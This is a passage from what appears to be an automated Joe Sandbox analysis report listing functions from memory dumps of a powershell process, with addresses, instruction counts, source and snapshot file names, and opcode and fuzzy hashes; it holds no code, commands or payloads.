                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c62e247ee6172f69bb7b95313cacf67caf4dc15abccea76c05952c5ae74a389a
                                                        • Instruction ID: 0d174f75306bb48554f08f6c9545a7c2f041de6da4c1a6bc8722d95a3da43b68
                                                        • Opcode Fuzzy Hash: c62e247ee6172f69bb7b95313cacf67caf4dc15abccea76c05952c5ae74a389a
                                                        • Instruction Fuzzy Hash: 5351E530A022458FCB05DFACC494AAEBFB2FF49314F248299E555EB3A1D735AC52CB50
                                                        Function 098115F5 Relevance: .1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291769093.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 388594302140444a0f2aa0ad51c505925304436a9850c31541b42cd249162c02
                                                        • Instruction ID: 29618949b64db8fa2e55fb2c7a231d1d0ef984b2d9f2155912e27b224b3a0b11
                                                        • Opcode Fuzzy Hash: 388594302140444a0f2aa0ad51c505925304436a9850c31541b42cd249162c02
                                                        • Instruction Fuzzy Hash: EB316C31B0A2118FCB2955B504583BEB7895FE2754F18843EE642CB785EF76CC41C762
                                                        Function 07AD3E00 Relevance: .1, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb845c0f944e13f6b2456aa0f99eb36db2018cc1ae34e8e35f7609d43439a7f9
                                                        • Instruction ID: 427a3ac81ff23b1392765425ec18aefc6dedc5d4ef28aad1fe8f52f86cf0e976
                                                        • Opcode Fuzzy Hash: fb845c0f944e13f6b2456aa0f99eb36db2018cc1ae34e8e35f7609d43439a7f9
                                                        • Instruction Fuzzy Hash: 5D4137B2B00225DBCF249B6988406AEF7F5AFC8610B14C16AD96ADB240DB31DD01C7E3
                                                        Function 04FBC94C Relevance: .1, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7829d20f6abfdc2b775a407e8f3ae2449d6659bebce80e596c042d6b7dc2c729
                                                        • Instruction ID: a1554cc9170be919638814f1d6a40c3553aca84fca503a4fdf90b2fc845879be
                                                        • Opcode Fuzzy Hash: 7829d20f6abfdc2b775a407e8f3ae2449d6659bebce80e596c042d6b7dc2c729
                                                        • Instruction Fuzzy Hash: C9513C35A00249CFDB04CF69C494ADEBBB6FF89314F148168D841AB395D734ED86CBA1
                                                        Function 04FB9040 Relevance: .1, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 516af18f6b547cc3e690f087bb11338c38ced6b6545dbb84f7d38319f1efa73c
                                                        • Instruction ID: 93cb4867204eff9f980ebd457fdc7c8e7e21a3ccd0357c492d6cf31cc68edf85
                                                        • Opcode Fuzzy Hash: 516af18f6b547cc3e690f087bb11338c38ced6b6545dbb84f7d38319f1efa73c
                                                        • Instruction Fuzzy Hash: 44416634B012049FDB48DFB9C454BAEB6F7EFC8310F14C069D849AB755CA75AC428BA1
                                                        Function 0928BC40 Relevance: .1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01cdaed8968a1d3218fead8ebbac244d21548d2159ebb8aafdb3a7b0ef0872af
                                                        • Instruction ID: c3b9484fdd428fb56c0c7939ffef616b870c08e33e2a1ff8079b244a02439f1a
                                                        • Opcode Fuzzy Hash: 01cdaed8968a1d3218fead8ebbac244d21548d2159ebb8aafdb3a7b0ef0872af
                                                        • Instruction Fuzzy Hash: B5412C74A115199FCB04DF9CC980AAEBBB2FF48320F648259E954EB3A0D735EC51CB94
                                                        Function 0928BCB1 Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a02bf9815c0e3cbc56d69edb996d07c1f134e0cec636aca3c7d34b6f15f2d038
                                                        • Instruction ID: 521bd1ab17f99917bb9bb6b7d5b5b6df9a08771d87baab57724d90193d16cf34
                                                        • Opcode Fuzzy Hash: a02bf9815c0e3cbc56d69edb996d07c1f134e0cec636aca3c7d34b6f15f2d038
                                                        • Instruction Fuzzy Hash: 30414F74A016099FCB05DF9CC980AAEBBB2FF48320F248259E954EB390D735EC51CB90
                                                        Function 0928C278 Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f46d5a6654dfca306e5aa0adb072e3e3edb3fa097f44e6742a3db9ac60975ab
                                                        • Instruction ID: b5c5a99b7f8b114211afb6c1b2f75291a51920dc80d2692b3da4e96e3a0e4d89
                                                        • Opcode Fuzzy Hash: 2f46d5a6654dfca306e5aa0adb072e3e3edb3fa097f44e6742a3db9ac60975ab
                                                        • Instruction Fuzzy Hash: 78412970A115099FCB05DF9CC4819AEBBF2FF48310F248259E955EB3A0D735AC52CBA0
                                                        Function 07AD2068 Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f5833801b9dbef0a019024e777c9886fedbc94126848f2d761eb696bfe1f135
                                                        • Instruction ID: efdc390b24c522a7a0e19d12f324330e2bd0beee6428dc8946526a09d0c9d4ae
                                                        • Opcode Fuzzy Hash: 0f5833801b9dbef0a019024e777c9886fedbc94126848f2d761eb696bfe1f135
                                                        • Instruction Fuzzy Hash: F53127F4B40212DFCF248F548900B7A7BE6BFD5650F448169E91A9F294E732CD81CB92
                                                        Function 04FB2BB0 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4d44bb7f3601ca24fc812fdfba7035bdb0a9d4695c0d8af20e7a24595d7d139
                                                        • Instruction ID: 65db52eaaa62edcf5c3efb396d6d3e6771349848d533f67632e340dfebe37c85
                                                        • Opcode Fuzzy Hash: d4d44bb7f3601ca24fc812fdfba7035bdb0a9d4695c0d8af20e7a24595d7d139
                                                        • Instruction Fuzzy Hash: 28415A74A002099FCB05CF59C498DEAFBB1FF49310B228699D945AB365C736FC52CBA4
                                                        Function 07AD7BA0 Relevance: .1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f3fe7cdf58c487ef85cc05b3a351156e93819a57cb7eb8511df2ce416ffef0d
                                                        • Instruction ID: dd672393aa4b10a7d67a4e2bd9de1fe6a8f08c99b9b0c562bb1cf577f6289f9e
                                                        • Opcode Fuzzy Hash: 1f3fe7cdf58c487ef85cc05b3a351156e93819a57cb7eb8511df2ce416ffef0d
                                                        • Instruction Fuzzy Hash: DF31E5B4B01214AFD708ABB4C811FAE76A3DFC5714F10D029E905AF794CF7AAC418B95
                                                        Function 04FB3518 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1fdc16e30794a7f2e9ad5754896dd0bcb617d02eafe62d6b446bf14d7650130a
                                                        • Instruction ID: 0b53f6b948f88d6fef2cc58c92d6540ee45d67fd3609df9e1c3c085f82aef1b6
                                                        • Opcode Fuzzy Hash: 1fdc16e30794a7f2e9ad5754896dd0bcb617d02eafe62d6b446bf14d7650130a
                                                        • Instruction Fuzzy Hash: B7314B75A0060A9FCB04CF5DC5819A9FBF2FF49310B258299E949A7751C731FD92CBA0
                                                        Function 04FB3528 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2de3430093159ee8ba8d94d791ee028412a49cfc57827d0041ae2fb6e427de38
                                                        • Instruction ID: 7f2647e46c8112fb48c01abd26e77593ce62fbda68f6b293144f58504da85d63
                                                        • Opcode Fuzzy Hash: 2de3430093159ee8ba8d94d791ee028412a49cfc57827d0041ae2fb6e427de38
                                                        • Instruction Fuzzy Hash: 0C313974A006099FCB04CF59C5819AAFBF2FF49310B258299E999EB751C731FC52CBA1
                                                        Function 0928B397 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7fb82a4d3547d4b9a979941b4ff5d4145cc585bea8fa046495b0173c3e062a9
                                                        • Instruction ID: 4f8604b1c1eae91afa93ebc53d7d376b006f4fa535bbe9416a0f8eb8543683a9
                                                        • Opcode Fuzzy Hash: e7fb82a4d3547d4b9a979941b4ff5d4145cc585bea8fa046495b0173c3e062a9
                                                        • Instruction Fuzzy Hash: 52316C70A015059FCB14DF98C9919AEFBF1FF48310B248299E959EB791C735EC91CB90
                                                        Function 07AD8B4F Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4e4d3495f457eff163ee46fe0b6cbd9e9718a3c97fe10225a57b1ebf11352e7
                                                        • Instruction ID: 8777bf527ee00828e87a6720f9a14856fe6548bb3abb9007a90c09d1ca50b491
                                                        • Opcode Fuzzy Hash: b4e4d3495f457eff163ee46fe0b6cbd9e9718a3c97fe10225a57b1ebf11352e7
                                                        • Instruction Fuzzy Hash: 3C2102F8705342DFCB119B2488407BA7FB1AFD2640F0840A6D966DF282D77E8D45CB92
                                                        Function 07AD3DDF Relevance: .1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c11825e49b2da52b77705af49a24bdc17012f9efba12bf4446fb18d9289abe6
                                                        • Instruction ID: 527a0598126b9be2e08e33043acd5ccbba2eae511a4d691b94b47d2206509a7f
                                                        • Opcode Fuzzy Hash: 7c11825e49b2da52b77705af49a24bdc17012f9efba12bf4446fb18d9289abe6
                                                        • Instruction Fuzzy Hash: 4E21EAB6A05356DFCF115B29C5401A5FBF0EF8A11072581D6C8AADB292DB30DD05C7E3
                                                        Function 04FBDE08 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3151e5d84e9b0f2a9d861ddef77e51a872bab5ea606bfecdbab228c9fc023f0
                                                        • Instruction ID: f2d7a414a6d5d746830a7fed4cfb8187a2ba4e528b4767a214f4b7939493ed5b
                                                        • Opcode Fuzzy Hash: e3151e5d84e9b0f2a9d861ddef77e51a872bab5ea606bfecdbab228c9fc023f0
                                                        • Instruction Fuzzy Hash: C431BC74E056448EDB60CF6AD4887CAFFF2EF89324F28C05ED88997215C6746882CF91
                                                        Function 04ACF520 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aab334e581b3ea7777c4ddcf1891d68d6f78bf9047a0cc5a1828273ddc01523d
                                                        • Instruction ID: 59af08e21af33309e66b5ab87f88a479725aa238fc588268f0f8b44a8730d044
                                                        • Opcode Fuzzy Hash: aab334e581b3ea7777c4ddcf1891d68d6f78bf9047a0cc5a1828273ddc01523d
                                                        • Instruction Fuzzy Hash: CB21E275600244EFDF45CF14D9C4F26BF62EB88314F24C5ADFA094A296C736E456CB61
                                                        Function 09812C92 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291769093.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 461fed994af1ae9fa95f54e6a54779d76fea68e8f8c2790da9d4d16bb22c7200
                                                        • Instruction ID: 323322760238a46fdedadd380769e2e855191e5530a991aa4f283763b6228e7f
                                                        • Opcode Fuzzy Hash: 461fed994af1ae9fa95f54e6a54779d76fea68e8f8c2790da9d4d16bb22c7200
                                                        • Instruction Fuzzy Hash: 87215B3270524A4ECB259668E8615EAF7A9BF91320F20C07FDAB5CB342DA358406C793
                                                        Function 07AD8B27 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 119af5b5f2548fa48bdfc9ee166a56004c648cbd787bbfdf58fc5f7a963d41e7
                                                        • Instruction ID: 673792051ead38b23efcd40fe7faa798ceb272d3e41ab360c8fae87028613c9e
                                                        • Opcode Fuzzy Hash: 119af5b5f2548fa48bdfc9ee166a56004c648cbd787bbfdf58fc5f7a963d41e7
                                                        • Instruction Fuzzy Hash: 4D1159F5341301EBDB28261419003BA7BA69BF1A91F085025DA13CF785CBBECC85C752
                                                        Function 04ACF51B Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4a2672e873c75f90f08f1b53a98ed7b08bafea223b3a60980afafd0f9142cd7
                                                        • Instruction ID: fda659ff4576b0c90ec5e8772be7956c80034747c5ce5cf64f2c4f8713c4349c
                                                        • Opcode Fuzzy Hash: d4a2672e873c75f90f08f1b53a98ed7b08bafea223b3a60980afafd0f9142cd7
                                                        • Instruction Fuzzy Hash: 29218C76504284DFDF06CF14D9C4B16BF62FB48314F24C6AEE9094A696C33AD46ACB91
                                                        Function 04FBAE5A Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dabb0f74daaccfc56ddc534574949198bb580785631d0c2ee230d61058404729
                                                        • Instruction ID: 7528a1be1017ce128722c17f7d6797308caaa8d146bdb3ded82c3ae1743b5b6a
                                                        • Opcode Fuzzy Hash: dabb0f74daaccfc56ddc534574949198bb580785631d0c2ee230d61058404729
                                                        • Instruction Fuzzy Hash: E60196357052844FCB069B79A4984AD7FA2DFDA221325409EE543CB353DFB89C06C756
                                                        Function 04FBC3F0 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1222e2d7bdaf32e45dd5a469ae5831d74f3cf7612a968624fc8078da0001811c
                                                        • Instruction ID: fe363b441e6760e6e909e97812333a9950e53dc636da2f659b79c931e6d53e6e
                                                        • Opcode Fuzzy Hash: 1222e2d7bdaf32e45dd5a469ae5831d74f3cf7612a968624fc8078da0001811c
                                                        • Instruction Fuzzy Hash: CB012B313083802BD7199779EC50B9E7F53AFC2614F5485ADD5865F292C9A17C0987A1
                                                        Function 04ACD01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 207cea89ebd53f7429e4809acbd345aa7d246d32229131b8ba358eeba116fa01
                                                        • Instruction ID: c89326075db588055f8c81dc757389729de3ef986055a16c93f71cb1a504e50b
                                                        • Opcode Fuzzy Hash: 207cea89ebd53f7429e4809acbd345aa7d246d32229131b8ba358eeba116fa01
                                                        • Instruction Fuzzy Hash: 1901A271505340AAF7608F2EEC84B67BFE8DF41334F18C13EED4A5A246D679A846C6B1
                                                        Function 04FB635B Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f513c7d0c0b90c48d34905791f20e1820ec5b742276b7c22ee9c6ee134211d4
                                                        • Instruction ID: dfdf609a313c52e4dc6b3ba53875398860173815b393501931bfbcaf097f62d4
                                                        • Opcode Fuzzy Hash: 9f513c7d0c0b90c48d34905791f20e1820ec5b742276b7c22ee9c6ee134211d4
                                                        • Instruction Fuzzy Hash: 67014FB8B002159FDB04DB99D490AEDF771FF8E304B248559D95ADB361CA35EC038B91
                                                        Function 04FBAED0 Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c201c02cb9deb3028ba1bfe8a56455c2f9639904e8c083207b94429b2f0f6f01
                                                        • Instruction ID: b80927bdc74f0d858a9b7ade0ed03dd92f1e7554331f8d74c6e18c16c6307402
                                                        • Opcode Fuzzy Hash: c201c02cb9deb3028ba1bfe8a56455c2f9639904e8c083207b94429b2f0f6f01
                                                        • Instruction Fuzzy Hash: 8B01D6353052444FC7066B38A4A84AD7FE3EFDA221325405EE943C7352DFB49C028756
                                                        Function 04FBC400 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: efd6f6535056d9f730978fa7935449f0c8fdcfc508d2578bd343d45c666dbad1
                                                        • Instruction ID: e91647698bd1b7774eeb7d038d2bec8e05d9c55e6b8fd17bd0e0586c431e3902
                                                        • Opcode Fuzzy Hash: efd6f6535056d9f730978fa7935449f0c8fdcfc508d2578bd343d45c666dbad1
                                                        • Instruction Fuzzy Hash: 8DF0F0313443002BE718A76AEC50F5E774BEFC4624F60C82CE50A5B395CDA1BC0A87A5
                                                        Function 04FBCB10 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0f85699bfa5ab0b6331a31506445c50579db684cadf5e5ea1bdac07da3b7fc8
                                                        • Instruction ID: 417df9553d64610ef69b678bb9f9b660d1530a727d13843912339e8fb0dd1eab
                                                        • Opcode Fuzzy Hash: c0f85699bfa5ab0b6331a31506445c50579db684cadf5e5ea1bdac07da3b7fc8
                                                        • Instruction Fuzzy Hash: 97F0F6367002044BDB146B69E4946AF77ABFBCA211B44813ED48A87241EFB5AC0243D6
                                                        Function 04FBAEE0 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14e827cd4235b27b745d325079a3ab51e42da8212e85d8c2b7231072008fd305
                                                        • Instruction ID: 67f03eb00b231cebbf50fa5b63a051275b522f100c78e4a240afa149c27785d6
                                                        • Opcode Fuzzy Hash: 14e827cd4235b27b745d325079a3ab51e42da8212e85d8c2b7231072008fd305
                                                        • Instruction Fuzzy Hash: 6EF030353105144F87056B79A59846E7BE7EFD9622325401DE907C7382EFB49C028795
                                                        Function 04FBCB00 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9984461fad172da599ea9b1b099db5d984e07b8613982d20fa7003f3b352d4a
                                                        • Instruction ID: ff0b2af456e799a1f4e1b0bbe4d8ac6b913f5a12242f121e8ab0ddd5a8c421a4
                                                        • Opcode Fuzzy Hash: b9984461fad172da599ea9b1b099db5d984e07b8613982d20fa7003f3b352d4a
                                                        • Instruction Fuzzy Hash: 4FF0593630A2905BC702077CA4944AE7F26FFC7225704417FD08ACB383DAF15C028392
                                                        Function 04ACD01C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ebc264d61c65819a43ffd8f22411690a4378501045fbae93d7098c9b6e99c420
                                                        • Instruction ID: cc5f54b1979855550a1ed7fd2a4e0ae83ef79b654a01ed978a39f476f1d66f13
                                                        • Opcode Fuzzy Hash: ebc264d61c65819a43ffd8f22411690a4378501045fbae93d7098c9b6e99c420
                                                        • Instruction Fuzzy Hash: 4CF0C271004240AEE7108F1ADCC4B63FFD8EB51334F18C15EED485A286C279A845CAB0
                                                        Function 04FBDAEF Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4a6f4f085b32384afedf84590375bb5546c09303fcdb35382dc04c66aa6b9a3c
                                                        • Instruction ID: f1cff3457099b6c3281a3d0fc003eb95590dd0088cc7145d0e6bedc38b88db00
                                                        • Opcode Fuzzy Hash: 4a6f4f085b32384afedf84590375bb5546c09303fcdb35382dc04c66aa6b9a3c
                                                        • Instruction Fuzzy Hash: 23F0C2B5A041041FEB116B75D0143EB3BB1EBC135AF14816DC80597396CA796D05CB91
                                                        Function 04FBDB70 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
